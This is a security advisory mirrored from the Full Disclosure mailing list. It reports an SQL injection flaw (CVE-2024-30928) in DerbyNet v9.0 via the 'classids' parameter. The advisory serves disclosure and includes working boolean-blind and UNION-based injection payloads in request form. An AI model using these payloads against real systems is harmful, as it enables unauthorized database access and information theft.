Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

CVE-2024-30928: SQL Injection Vulnerability in DerbyNet v9.0 via 'classids' Parameter

Related Vulnerabilities: CVE-2024-30928  
Source 
                							

                <!--X-Body-Begin-->
<!--X-User-Header-->
<a href="/fulldisclosure/"><img src="/images/fulldisclosure-logo.png" class="l-logo right" alt="fulldisclosure logo" width="80"></a>
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<!--X-User-Header-End-->
<!--X-TopPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="13"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#14">By Date</a>
<a href="15"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="13"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#14">By Thread</a>
<a href="15"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<form class="nst-search center" action="/search/fulldisclosure">
<input class="nst-search-q" name="q" type="search" placeholder="List Archive Search">
<button class="nst-search-button" title="Search">
<img style="width:100%;aspect-ratio:1/1;" alt="" aria-hidden="true" src="/shared/images/nst-icons.svg#search">
</button>
</form>

</div>

<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">CVE-2024-30928: SQL Injection Vulnerability in DerbyNet v9.0	via 'classids' Parameter</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->


<em>From</em>: Valentin Lobstein via Fulldisclosure &lt;fulldisclosure () seclists org&gt;


<em>Date</em>: Wed, 03 Apr 2024 18:38:51 +0000


<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<pre style="margin: 0em;">CVE ID: CVE-2024-30928

Description:
An SQL Injection vulnerability has been discovered in DerbyNet version 9.0, particularly within the 
`ajax/query.slide.next.inc` file. This vulnerability allows remote attackers to execute arbitrary code and disclose 
sensitive information by exploiting the unvalidated `classids` parameter used in constructing SQL queries. This 
parameter is not properly sanitized before being included in the SQL statement, leading to a critical risk of SQL 
Injection.

Vulnerability Type: SQL Injection

Vendor of Product: DerbyNet - Available on GitHub: <a rel="nofollow" href="https://github.com/jeffpiazza/derbynet">https://github.com/jeffpiazza/derbynet</a>

Affected Product Code Base: DerbyNet - v9.0

Affected Component: ajax/query.slide.next.inc

Attack Type: Remote

Impacts:
- Code execution: True
- Information Disclosure: True

Attack Vectors:
The vulnerability is primarily exploited by manipulating the `classids` parameter in the user's request to the 
`ajax/query.slide.next.inc` file. The lack of adequate input validation allows attackers to inject malicious SQL code 
through this parameter. Example attack vectors include:

- Direct exploitation:
- `<a rel="nofollow" href="http://127.0.0.1:8000/action.php?query=slide.next&amp;mode=racer&amp;classids=1`">http://127.0.0.1:8000/action.php?query=slide.next&amp;mode=racer&amp;classids=1`</a>

- Boolean-based blind SQL Injection:
- Payload: `query=slide.next&amp;mode=racer&amp;classids=1) AND 4365=4365 AND (6880=6880`

- UNION query SQL Injection:
- Payload: `query=slide.next&amp;mode=racer&amp;classids=-3890) UNION ALL SELECT 
NULL,NULL,CHAR(113,107,120,122,113)||CHAR(79,97,117,85,112,79,82,85,75,114,65,66,118,100,117,107,79,118,111,104,67,105,87,86,72,110,107,119,113,86,106,107,115,100,110,109,98,77,85,115)||CHAR(113,118,120,120,113),NULL,NULL,NULL,NULL,NULL--
 rDzQ`

These vectors demonstrate how an attacker could manipulate SQL queries to potentially access or manipulate database 
information unauthorizedly.

Discoverer: Valentin Lobstein

References:
- Official website: <a rel="nofollow" href="http://derbynet.com">http://derbynet.com</a>
- Source code on GitHub: <a rel="nofollow" href="https://github.com/jeffpiazza/derbynet">https://github.com/jeffpiazza/derbynet</a>
_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives &amp; RSS: <a rel="nofollow" href="https://seclists.org/fulldisclosure/">https://seclists.org/fulldisclosure/</a>

</pre>
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="13"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#14">By Date</a>
<a href="15"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="13"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#14">By Thread</a>
<a href="15"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
</div>
<h3 class="m-thread">Current thread:</h3>
<ul class="thread">
<li><strong>CVE-2024-30928: SQL Injection Vulnerability in DerbyNet v9.0	via 'classids' Parameter</strong> <em>Valentin Lobstein via Fulldisclosure (Apr 05)</em>
</li></ul>


<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started